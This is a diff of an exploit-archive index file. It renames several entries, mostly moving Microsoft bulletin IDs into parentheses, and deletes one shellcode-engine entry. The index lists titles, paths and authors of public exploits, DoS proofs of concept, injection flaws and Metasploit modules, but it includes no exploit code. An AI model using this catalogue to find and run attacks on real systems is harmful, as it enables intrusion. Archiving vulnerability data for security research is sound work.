 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote DoS/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0
 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash PoC",2010-01-23,b0telh0,windows,dos,0
@@ -11174,7 +11174,7 @@ id,file,description,date,author,platform,type,port
 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
-12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"laurent gaffie",windows,dos,0
+12258,platforms/windows/dos/12258.py,"Windows - SMB Client-Side Bug Proof of Concept (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
 12259,platforms/php/dos/12259.php,"PHP 5.3.x DoS",2010-04-16,ITSecTeam,php,dos,0
 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0
 12261,platforms/windows/local/12261.rb,"Archive Searcher .zip Stack Overflow",2010-04-16,Lincoln,windows,local,0
@@ -11400,7 +11400,7 @@ id,file,description,date,author,platform,type,port
 12515,platforms/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution Vulnerability",2010-05-05,"Sn!pEr.S!Te Hacker",php,webapps,0
 12516,platforms/windows/local/12516.py,"BaoFeng Storm M3U File Processing Buffer Overflow Exploit",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0
 12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 LFI",2010-05-06,Batch,php,webapps,0
-12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005",2010-05-06,unsign,windows,dos,0
+12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow Vulnerability (DoS) (MS10-005)",2010-05-06,unsign,windows,dos,0
 12519,platforms/php/webapps/12519.txt,"AV Arcade Search Field XSS/HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0
 12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0
 12521,platforms/php/webapps/12521.txt,"Factux LFI Vulnerability",2010-05-06,"ALTBTA ",php,webapps,0
@@ -11727,7 +11727,6 @@ id,file,description,date,author,platform,type,port
 13284,platforms/generator/shellcode/13284.txt,"/bin/sh Polymorphic shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0
 13285,platforms/generator/shellcode/13285.c,"linux/x86 shellcode generator / null free",2008-08-19,BlackLight,generator,shellcode,0
 13286,platforms/generator/shellcode/13286.c,"Alphanumeric Shellcode Encoder Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0
-13287,platforms/generator/shellcode/13287.txt,"Download & Exec polymorphed shellcode Engine",2007-01-24,"YAG KOHHA",generator,shellcode,0
 13288,platforms/generator/shellcode/13288.c,"Utility for generating HTTP/1.x requests for shellcodes",2006-10-22,izik,generator,shellcode,0
 13289,platforms/generator/shellcode/13289.c,"Multi-Format Shellcode Encoding Tool - Beta 2.0 (w32)",2005-12-16,Skylined,generator,shellcode,0
 13290,platforms/hardware/shellcode/13290.txt,"Version-independent IOS shellcode",2008-08-21,"Andy Davis",hardware,shellcode,0
@@ -12618,7 +12617,7 @@ id,file,description,date,author,platform,type,port
 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0
 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0
 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
-14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
+14413,platforms/windows/dos/14413.txt,"Internet Explorer 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0
 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0
 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0
@@ -12679,7 +12678,7 @@ id,file,description,date,author,platform,type,port
 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 - SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0
 14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0
 14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0
-14484,platforms/windows/dos/14484.html,"IE6 / 7 Remote Dos vulnerability",2010-07-27,"Richard leahy",windows,dos,0
+14484,platforms/windows/dos/14484.html,"Internet Explorer 6 / 7 Remote Dos vulnerability",2010-07-27,"Richard leahy",windows,dos,0
 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0
 14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability",2010-07-28,mywisdom,unix,remote,0
@@ -13234,7 +13233,7 @@ id,file,description,date,author,platform,type,port
 15262,platforms/windows/dos/15262.txt,"Microsoft Office HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0
 15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service Vulnerability",2010-10-16,"MOHAMED ABDI",windows,dos,0
 15264,platforms/aix/dos/15264.py,"PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)",2010-10-16,ZoRLu,aix,dos,0
-15265,platforms/asp/remote/15265.rb,"MS10-070 ASP.NET Padding Oracle File Download",2010-10-17,"Agustin Azubel",asp,remote,0
+15265,platforms/asp/remote/15265.rb,"ASP.NET Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0
 15266,platforms/windows/remote/15266.txt,"Windows NTLM Weak Nonce Vulnerability",2010-10-17,"Hernan Ochoa",windows,remote,0
 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite",2010-10-17,d0lc3,windows,dos,0
 15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0
@@ -13254,7 +13253,7 @@ id,file,description,date,author,platform,type,port
 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class – Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
 15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
-15292,platforms/windows/remote/15292.rb,"MS10-070 ASP.NET Auto-Decryptor File Download Exploit",2010-10-20,"Agustin Azubel",windows,remote,0
+15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0
 15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0
 15295,platforms/php/webapps/15295.html,"sNews CMS Multiple XSS Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0
 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave player rcsL chunk memory corruption 0day",2010-10-21,Abysssec,windows,remote,0
@@ -13755,7 +13754,7 @@ id,file,description,date,author,platform,type,port
 15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15893,platforms/php/webapps/15893.py,"amoeba cms 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0
-15894,platforms/windows/dos/15894.c,"MS10-073 Windows Class Handling Vulnerability",2011-01-02,"Tarjei Mandt",windows,dos,0
+15894,platforms/windows/dos/15894.c,"Windows Class Handling Vulnerability (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0
 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
 15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0
 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0
@@ -13795,7 +13794,7 @@ id,file,description,date,author,platform,type,port
 15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection Vulnerability",2011-01-10,Aodrulez,php,webapps,0
 15962,platforms/solaris/local/15962.c,"LOCAL SOLARIS KERNEL ROOT EXPLOIT (< 5.10 138888-01)",2011-01-10,peri.carding,solaris,local,0
-15963,platforms/windows/remote/15963.rb,"MS10-081: Windows Common Control Library (Comctl32) Heap Overflow",2011-01-10,"Nephi Johnson",windows,remote,0
+15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
 15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 (calendar.php) SQL Injection Vulnerability",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0
 15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0
@@ -13809,8 +13808,8 @@ id,file,description,date,author,platform,type,port
 15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
 15979,platforms/php/webapps/15979.txt,"Joomla! Spam Mail Relay Vulnerability",2011-01-12,"Jeff Channell",php,webapps,0
 15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 HTTP Referer stored XSS",2011-01-12,"Saif El-Sherei",php,webapps,0
-15984,platforms/windows/remote/15984.html,"MS11-002: Microsoft Data Access Components Vulnerability",2011-01-12,"Peter Vreugdenhil",windows,remote,0
-15985,platforms/windows/local/15985.c,"MS10-073: Win32k Keyboard Layout Vulnerability",2011-01-13,"Ruben Santamarta ",windows,local,0
+15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components Vulnerability (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0
+15985,platforms/windows/local/15985.c,"Win32k - Keyboard Layout Vulnerability (MS10-073)",2011-01-13,"Ruben Santamarta ",windows,local,0
 15986,platforms/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735,1736 DoS",2011-01-13,"Craig Freyman",windows,dos,0
 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
 15988,platforms/windows/dos/15988.py,"Objectivity/DB Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0
@@ -14137,11 +14136,11 @@ id,file,description,date,author,platform,type,port
 16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",2010-09-28,metasploit,windows,remote,0
 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service NetpwPathCanonicalize Overflow",2011-02-17,metasploit,windows,remote,0
 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",2010-07-03,metasploit,windows,remote,0
-16369,platforms/windows/remote/16369.rb,"Microsoft Services MS06-066 nwwks.dll",2010-05-09,metasploit,windows,remote,0
+16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,metasploit,windows,remote,0
 16370,platforms/windows/remote/16370.rb,"Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service Overflow",2010-07-03,metasploit,windows,remote,0
 16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service NetpManageIPCConnect Overflow",2010-10-05,metasploit,windows,remote,0
-16373,platforms/windows/remote/16373.rb,"Microsoft Services MS06-066 nwapi32.dll",2010-08-25,metasploit,windows,remote,0
+16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,metasploit,windows,remote,0
 16374,platforms/windows/remote/16374.rb,"Microsoft Windows Authenticated User Code Execution",2010-12-02,metasploit,windows,remote,0
 16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service RASMAN Registry Overflow",2010-08-25,metasploit,windows,remote,0
 16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",2010-11-24,metasploit,windows,remote,0
@@ -14349,7 +14348,7 @@ id,file,description,date,author,platform,type,port
 16578,platforms/windows/remote/16578.rb,"Internet Explorer createTextRange() Code Execution",2010-09-20,metasploit,windows,remote,0
 16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",2010-04-30,metasploit,windows,remote,0
-16581,platforms/windows/remote/16581.rb,"MS03-020 Internet Explorer Object Type",2010-08-25,metasploit,windows,remote,0
+16581,platforms/windows/remote/16581.rb,"Internet Explorer - Object Type (MS03-020)",2010-08-25,metasploit,windows,remote,0
 16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16583,platforms/windows/remote/16583.rb,"Internet Explorer Data Binding Memory Corruption",2010-09-20,metasploit,windows,remote,0
 16584,platforms/windows/remote/16584.rb,"RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",2010-06-15,metasploit,windows,remote,0
@@ -14588,7 +14587,7 @@ id,file,description,date,author,platform,type,port
 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server <= 5.0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,2380
 16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25
 16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25
-16820,platforms/windows/remote/16820.rb,"MS03-046 Exchange 2000 XEXCH50 Heap Overflow",2010-11-11,metasploit,windows,remote,25
+16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,metasploit,windows,remote,25
 16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",2010-06-22,metasploit,windows,remote,25
 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,metasploit,windows,remote,25
 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 LDAP Buffer Overflow",2010-11-14,metasploit,windows,remote,389
@@ -14912,7 +14911,7 @@ id,file,description,date,author,platform,type,port
 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
-17177,platforms/windows/local/17177.rb,"MS Word - Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
+17177,platforms/windows/local/17177.rb,"MS Word 2003 - Record Parsing Buffer Overflow (meta) (MS09-027)",2011-04-16,"Andrew King",windows,local,0
 17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0
 17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0
 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0
@@ -15095,7 +15094,7 @@ id,file,description,date,author,platform,type,port
 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 DoS Exploit",2011-06-16,"Soroush Dalili",windows,dos,0
 17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0
 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 persistent XSS via SQL Injection",2011-06-17,Saif,php,webapps,0
-17409,platforms/windows/remote/17409.rb,"MS11-050 IE mshtml!CObjectElement Use After Free",2011-06-17,metasploit,windows,remote,0
+17409,platforms/windows/remote/17409.rb,"Internet Explorer - mshtml!CObjectElement Use After Free (MS11-050)",2011-06-17,metasploit,windows,remote,0
 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0
 17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0
 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) SQL Injection Vulnerability",2011-06-19,CoBRa_21,php,webapps,0
@@ -15153,7 +15152,7 @@ id,file,description,date,author,platform,type,port
 17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0
 17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0
 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
-17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
+17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053)",2011-07-03,"Myo Soe",windows,dos,0
 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0
 17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0
 17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
@@ -15302,7 +15301,7 @@ id,file,description,date,author,platform,type,port
 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0
 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0
-17659,platforms/windows/remote/17659.rb,"MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0
+17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,metasploit,windows,remote,0
 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0
 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0
 17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x (4.6.5) SQL Injection Vulnerability",2011-08-13,"Aung Khant",php,webapps,0
@@ -15578,9 +15577,9 @@ id,file,description,date,author,platform,type,port
 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0
 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0
 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
-17978,platforms/windows/dos/17978.txt,"MS11-077 .fon Kernel-Mode Buffer Overrun PoC",2011-10-13,"Byoungyoung Lee",windows,dos,0
+17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0
 17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin <= 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0
-17981,platforms/windows/dos/17981.py,"MS11-064 TCP/IP Stack Denial of Service",2011-10-15,"Byoungyoung Lee",windows,dos,0
+17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0
 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop .zap file Local Denial of Service Vulnerability",2011-10-15,Silent_Dream,windows,dos,0
 17983,platforms/php/webapps/17983.txt,"Wordpress Plugin Photo Album Plus <= 4.1.1 - SQL Injection Vulnerability",2011-10-15,Skraps,php,webapps,0
 17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0
@@ -15619,7 +15618,7 @@ id,file,description,date,author,platform,type,port
 18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0
 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0
 18023,platforms/php/webapps/18023.java,"phpLDAPadmin 0.9.4b DoS",2011-10-23,Alguien,php,webapps,0
-18024,platforms/windows/dos/18024.txt,"MS11-077 Win32k Null Pointer De-reference Vulnerability PoC",2011-10-23,KiDebug,windows,dos,0
+18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference Vulnerability PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
 18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0
 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",2011-10-24,metasploit,windows,local,0
 18028,platforms/windows/dos/18028.py,"zFTP Server ""cwd/stat"" Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0
@@ -15673,7 +15672,7 @@ id,file,description,date,author,platform,type,port
 18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0
-18087,platforms/windows/local/18087.rb,"MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",2011-11-05,metasploit,windows,local,0
+18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,metasploit,windows,local,0
 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0
 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit - DEP Bypass",2011-11-07,pasta,windows,remote,0
 18090,platforms/php/webapps/18090.txt,"LabStoRe <= 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0
@@ -15718,7 +15717,7 @@ id,file,description,date,author,platform,type,port
 18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
 18140,platforms/windows/dos/18140.txt,"win7 keylayout Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0
 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0
-18143,platforms/windows/local/18143.rb,"MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow",2011-11-22,metasploit,windows,local,0
+18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,metasploit,windows,local,0
 18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 , DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0
 18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0
 18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0
@@ -15873,7 +15872,7 @@ id,file,description,date,author,platform,type,port
 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,bsd,remote,0
 18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0
 18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0
-18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability MS12-005",2012-01-14,"Byoungyoung Lee",windows,local,0
+18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0
 18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0
 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0
@@ -15916,7 +15915,7 @@ id,file,description,date,author,platform,type,port
 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,metasploit,windows,remote,0
 18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 ""proc_deutf()"" Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0
-18426,platforms/windows/remote/18426.rb,"MS12-004 midiOutPlayNextPolyEvent Heap Overflow",2012-01-28,metasploit,windows,remote,0
+18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,metasploit,windows,remote,0
 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0
 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0
 18429,platforms/php/webapps/18429.pl,"4images 1.7.6 - 9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0
@@ -16095,7 +16094,7 @@ id,file,description,date,author,platform,type,port
 18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 Remote SQL Injection and XSS Vulnerability",2012-03-21,LiquidWorm,php,webapps,0
